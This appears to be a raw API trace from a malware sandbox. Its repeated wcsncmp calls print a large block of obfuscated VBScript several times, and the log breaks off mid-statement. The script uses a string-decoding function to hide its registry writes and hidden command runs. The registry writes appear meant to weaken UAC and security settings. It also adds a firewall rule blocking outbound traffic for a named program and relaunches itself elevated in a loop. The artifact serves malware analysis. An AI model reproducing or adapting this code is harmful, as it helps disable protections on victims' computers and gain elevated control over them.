bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0222.984] wcsncmp (_String1="const NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 86 [0222.984] wcsncmp (_String1="onst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 98 [0222.984] wcsncmp (_String1="nst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97 [0222.984] wcsncmp (_String1="st NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd 